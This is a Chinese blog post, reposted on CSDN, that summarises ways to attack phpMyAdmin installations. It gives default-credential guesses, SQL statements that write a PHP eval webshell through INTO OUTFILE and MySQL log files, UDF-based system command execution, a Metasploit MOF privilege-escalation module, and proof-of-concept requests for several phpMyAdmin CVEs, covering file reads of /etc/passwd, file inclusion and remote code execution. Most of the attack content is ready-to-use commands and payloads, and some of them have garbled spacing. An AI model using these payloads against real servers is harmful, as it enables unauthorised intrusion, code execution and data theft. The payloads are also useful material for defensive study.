phpmyadmin 3.5 无法显示表内容_phpMyAdmin 渗透利用总结

最新推荐文章于 2023-03-10 09:24:55 发布
最新推荐文章于 2023-03-10 09:24:55 发布
阅读量349 收藏
点赞数
文章标签: phpmyadmin 3.5 无法显示表内容
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42509720/article/details/113311062
版权

621324b37b4dae93f650df2005dc3226.png
重生信息安全
作者:T3ngYu

在对目标进行目录扫描时经常会遇到phpMyAdmin,特地总结下phpMyAdmin的利用思路,关于phpMyAdmin的漏洞环境可以参考vulhub,复现过的都忘记截图,请大家见谅。

一、phpMyAdmin版本判断:

5313a8d726f70a5ba33baa99fc3852c9.png

ec492c9f8594636a5772528fc1b56af1.png

也可以直接访问:/doc/html/index.html目录

二、phpMyAdmin利用:
phpMyAdmin的漏洞多为经过验证后的才能利用,所以需要进入后台,可以采用爆破的方式进入后台,常用的有:

root:root 
root:(space)
mysql:mysql 
……

1.最常使用的get shell方式:
直接用into outfile 直接在网站目录下写入webshell,但是该方法需要前提条件是:
(1) 当前的数据库用户有写权限
(2) 知道web绝对路径
(3) web路径能写

1.1 如何判断当前数据库用户有写权限?
执行:

show variables like '%secure%';

如果secure_file_priv如果非空,则只能在对应的目录下读文件,如果是空即可在其他目录写。Linux下默认/tmp目录可写。

1.2 web绝对路径:在可读写的前提下如何获取web路径?
(1) phpinfo() 页面:最理想的情况,直接显示web路径
(2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径
(3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以通过查看数据库路径

select'test'intooutfile'/var/www/$fuzz$/shell.php';

时目录$fuzz$不存在将会报错Can't create/write to file '/var/www/html/666.txt' (Errcode: 2);如果存在但是目录写不进去将返回(Errcode: 13);如果使用的

load data infile "/etc/passwd" into table test;

该语句执行后将也会显示文件是否存在,有权限能否写等信息。

1.3 web路径可写:
在知道web路径的基础上,使用

select '<?php @eval($_POST[cmd]);?>' into outfile '/var/www/xx/shell.php';

会 报 错 提 示 Can't create/write to file '/var/www/html/666.txt' (Errcode: 13) ,证明目录不可写,可以尝试网站下其他目录, 如

/upload
/templates
/cache

等目录。

2.日志get shell:
前提:读写权限+web绝对路径,修改日志文件为webshell
2.1通过写入日志文件getshell,具体方法如下:
(1) 开启日志记录:

set global general_log = "ON";

(2) 查看当前的日志目录:

show variables like 'general%';

(3) 指定日志文件

set global general_log_file = "C:/phpStudy/PHPTutorial/WWW/404.php";

(4)) 写入执行代码:

select "<?php phpinfo();?>";

2.2 通过慢查询写入webshell,具体方法如下:

(1) 查看当前慢查询日志目录:

show variables like '%slow%';

(2) 重新设置路径:

set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';

(3) 开启慢查询日志:

set GLOBAL slow_query_log=on;

(4)) 执行写入日志:

select '<?php phpinfo();?>' from mysql.db where sleep(10);

3.User defined funct ion(UDF):
适用于Windows和Linux环境,利用需要的条件:具有写权限+插件目录可写(或者可以更改指定的插件目录)。具体情况要看目标mysql的版本:
(1)Mysql version > 5.1 时,dll或者so必须位于mysql安装目录libplugin下,当对该目录具有写权限时可以利用,查看:

show variables like %plugin%;// 查看插件目录

(2)5.0 <= Mysql version <5.1时,需要导出至目标服务器的系统目录,如C://Windows/System32

(3)Mysql version < 5.0 时,目录可以自定义具体利用如下:

(1)根据目标mysql版本写入特定目录的so或者dll,可以参考sqlmap里面的

select 'It is dll' into dumpfile 'C:Program FilesMySQLMySQL Server 5.1l ibpluginlib_mysqludf_sys.dll';

(2)创建对应的function:

createfunction sys_eval returnsstringsoname"lib_mysqludf_sys.dll";

(3)执行命令:

select * from mysql.func where name = 'sys_eval';   #查看创建的sys_eval函数
select sys_eval('whoami');                          #使用系统命令

4.MOF提权:

通过mysql将文件写入一个MOF文件替换掉原有的MOF文件,然后系统每隔五秒就会执行一次上传的MOF。一般适用于Windows <= 2003,并且C:WindowsSystem32mof目录具有写权限(一般是没有权限写)。可以使用MSF直接利用:

use exploit/windows/mysql/mysql_mof
set rhost 192.168.1.5
set rport 3306
set password root
set username root
exploit

三、phpMyAdmin漏洞利用

1. WooYun-2016-1994 33:任意文件读取漏洞
影响phpMyAdmin 2.x版本,poc如下:

POST /scripts/setup.php HTTP/1.1 
Host: your-ip:8080
Accept-Encoding: gzip, deflate Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trid ent/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

2. CVE-2014 -8959:本地文件包含

影响范围:phpMyAdmin 4 .0.1--4 .2.12,需要PHP version < 5.3.4 ,Poc如下:

/gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=
/../../../../phpinfo.txt%00    # 注意改下token值

在实际利用中可以利用写入文件到/tmp目录下结合此漏洞完成RCE,php版本可以通过http header、导出表内容到文件的附加内容看到。

3. CVE-2016-5734 :后台RCE
影响范围:PhpMyAdmin 4 .0.x-4 .6.2,需要PHP 4 .3.0-5.4 .6 versions,利用如下:

cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"

4 . CVE-2018-1261:后台文件包含

phpMyAdmin 4 .8.0和4 .8.1,经过验证可实现任意文件包含。利用如下:

(1)执行SQL语句,将PHP代码写入Session文件中:

select '<?php phpinfo();exit;?>'

(2)包含session文件:

http://10.1.1.10/index.php?target=db_sql.php%253f/../../../../../../../../var/l ib/php/sessions/sess_*** # *** 为phpMyAdmin的COOKIE值

5. CVE-2018-19968:任意文件包含/RCE

phpMyAdmin 4 .8.0~4 .8.3,利用如下:

(1)创建数据库,并将PHP代码写入Session文件中

CREATE DATABASE foo;
CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';

(2)生成foo数据库的phpMyAdmin的配置表,访问:

http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo

(3)篡改数据插入pma column_info中:

INSERT INTO` pma__column_infoSELECT '1', 'foo', 'bar', 'baz', 'plop','plop', ' plop', 'plop','../../../../../../../../tmp/sess_***','plop'; # *** 为phpMyAdmin 的COOKIE值

这里要注意不用系统的session保存位置不同,具体系统可以在phpMyAdmin登录后首页看到

MacOS:

/var/tmp

Linux:

/var/lib/php/sessions

phpStudy:

/phpstudy/PHPTutorial/tmp/tmp

(4)访问包含Session文件的地址:

http://10.1.1.10/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[ multi_edit][][]=baz&clause_is_unique=1
般若之镜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PhpMyadmin各版本漏洞合集
09-13 5994
1.PhpMyAdmin存在PREGREPLACEEVAL漏洞 影响版本: 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 利用模块: exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238 2.PhpMyAdmin存在serversync.php 后门漏洞 影响版...
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9292
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
mysql phpmyadmin 空_访问phpmyadmin页面空白处理方法
weixin_42499530的博客
02-01 1663
标签:phpMyAdmin 是一个用PHP编写的,可以通过互联网控制和操作MySQL。通过phpMyAdmin可以完全对数据库进行操作,例如建立、复制/删除数据等等。有了phpMyAdmin 就可以完全不使用mysql命令,直接使用phpMyAdmin就能管理mysql的所有数据和数据库。这次主要说的访问phpmyadmin 出现空白页面,应该如何解决?首先要分析的原因,这边有三种,是经常会遇到的...
MySQL下“Can’t create/write to file xxx (Errcode: 13)”错误的解决方法
热门推荐
ncafei的博客
02-02 2万+
http://www.android100.org/html/201406/19/27784.html 最近碰到一个 MySQL不能创建临时文件的错误,解决过程中学到一些知识,这里分享一下,希望对碰到类似问题的同学有所帮助~ 关于MySQL临时文件: 1、MySQL使用环境变量TMPDIR的值作为保存临时文件的目录的路径名。如果未设置TMPDIR,MySQL将
phpMyAdmin(mysql)常见的写shell方法及版本漏洞汇总
m0_48108919的博客
02-21 7583
目录 前言 一、查看phpMyAdmin版本 二、phpmyadmin常见的getshell方法 1.前提 2.网站物理路径获取方法 3.通过into outfile getshell 4.通过日志文件写 shell 5.通过慢查询写shell 6.创建数据库和写入webshell 总结 前言 phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具 。 一、查看phpMyAdmin版本 phpMyAdmin是有很多公开漏
phpmyadmin显示MySQL数据表“使用中” 修复后依然无效的解决方法
12-15
打开phpmyadmin选择数据库查看,果然有3个显示为“使用中”。勾选之后进行“修复”,出现错误提示不能被修复。 于是接着从“分析”、“优化”开始,均告失败。失败信息第一条:can’t create new temp file ...
phpMyAdmin 链接的附加功能尚未激活问题的解决方法(已测)
01-20
phpmyadmin一直有“链接的附加功能尚未激活”的问题,登陆phpmyadmin后,会在底部显示“链接的附加功能尚未激活。要查出原因,请点击此处。”的提示。关于这个问题一直都没有着手去解决,直到今天,算是无聊的...
phpMyadmin 用户权限中英对照
10-29
– Chinese Simplified“,那么就有中文的管理界面了,虽然在phpmyadmin显示的用户权限显示的还是英文的,但是鼠标放上去时,有中文的提示,这里把phpmyadmin v3.2.4中英文对照附上
phpmyadmin之getshell总结
Adminxe的博客
05-03 488
0x00 前言 简单总结phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细写出利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。 0x01 getshell姿势 1、selectintooutfile直接写入 2、开启全局日志getshell 3、使用慢查询日志getse...
phpmyadmin拿权限
kzyyx的博客
08-31 756
标题phpmyadmin拿权限 挺垃圾的一个网站通过弱口令root进入后台。 最主要还能直接直行根目录下phpinfo查看网站绝对路径。 1.首先尝试执行outfile语句写入一句话木马 报错显示说是数据库正在运行–secure_file_priv选项,无法执行outfile这个语句。感觉在这个参数上做了限制。 这是secure_file_priv参数的说明。 2.执行show variables like “%secure%”; 查看配置 回显设置为NULL,没有做限制。暂时不知道原因,后续懂了做补
mysql导出、入某格的数据
Savay的博客
04-10 200
登陆mysql后,输入: show variables like '%secure%'; 显示的secure_file_priv如果value值为null,则为禁止,如果有文件夹目录,则只允许改目录下文件(测试子目录也不行),如果为空,则不限制目录; 修改配置可修改mysql配置文件my.cnf,查看是否有 secure_file_priv = 这样一行内容,如果没有,则手动添加, secure_file_priv = /home 示限制为/home文件夹 secure_file_priv = 示不限
phpmyadmin系列渗透思路连载(一)
PANDA墨森的博客
06-23 824
当拿到phpmyadin的站点后,我一般会尝试一下几种攻击手法: 1、通过弱口令进入后台,尝试into outfile写入一句话 条件:(1)有写的权限 (2)知道web绝对路径 (3)web路径可写(一般upload目录可写) show variables like '%secure%'; #如果为null就不可写,=""就可写 select '<?php eval($_POST[cmd]);?>' into outfile 'E:/www/xx/php'; #...
【mysql】CSV文件导入mysql(命令)
Gjiujiu的博客
03-10 4926
CSV文件导入mysql(命令)
恶意攻击行为之扫描PhpMyAdmin的溯源分析
云舒的博客
10-23 997
此溯源背景为监控恶意行为发现,发现的恶意IP分阶段性进行扫描,扫描特征为对PhpMyAdmin(以下简称phm)的版本号进行扫描,起初几条也就算了,发现类似攻击行为的恶意IP每天不断地出现,于是对其进行溯源分析,经过好些日子的分析,对分析结果总结如下。2、 在部分攻击机上发现config.json文件,其记录了加密的账号、密码,其与c3pool.com相关,经查询,此网站为一个挖矿网站,需科学上网才能访问,但不满足挖矿病毒的条件,也不意味着这个病毒就跟该网站有关。
详解步骤!!MYSQL导入数据出现secure-file-priv 的解决办法!
qq_41972223的博客
11-29 1万+
ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement. 今天做MySQL实验,导入文件的时候出现了这个错误,之后百度教程,结果一步步导致错误越来越多,实验做了一半,剩下的时间都用来改配置了,刚刚自己摸索了半天终于把错误...
MySql学习系列(三)
一个机器学习的学习之旅
05-18 425
MySql学习系列(三)2.1 MySQL 基础 (二)- 操作#学习内容#数据导入导出问题一:MySQL导出数据遇到secure-file-priv问题的解决方法#作业#项目七: 各部门工资最高的员工(难度:中等)项目八: 换座位(难度:中等)项目九: 分数排名(难度:中等) 2.1 MySQL 基础 (二)- 操作 #学习内容# 数据导入导出 1、将之前创建的任意一张MySQL导出,且是...
MYSQL导出数据出现The MySQL server is running with the --secure-file-priv,为null以及修改my.ini后无法启动的问题
weixin_41791715的博客
09-20 1472
(我用的mysql版本是5.5)在这篇文章中会详细介绍如何修改my.ini文件以及如何保存,以避免修改后mysql无法启动的问题 很多新手(比如我)在mysql导出数据时会出现error:The MySQL server is running with the --secure-file-priv option so it cannot execute this statement 1、show variables like '%secure%'; 像很多文章所写的一样,首先输入上.....
mysql语句进阶
weixin_45308292的博客
12-27 641
sql语句进阶 关于基本的sql语句使用,我放在了这篇博客,你们可以参考 我这章只将进阶知识 如果你发现有些命令输入后无法使用,可能是mysql版本过低 使用如下命令,查看mysql的版本 mysql> select version(); +-----------+ | version() | +-----------+ | 5.7.26 | +-----------+ 1 row i...
怎么在phpMyAdmin数据表里插入图片并显示在网页上
最新发布
04-03
要在phpMyAdmin数据表中插入图片并在网页上显示,需要完成以下步骤: 1. 在数据库中创建一个新的数据表,其中包括至少一个用于存储图像的BLOB列。 2. 在phpMyAdmin中打开数据表,并选择“插入”选项卡以向该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值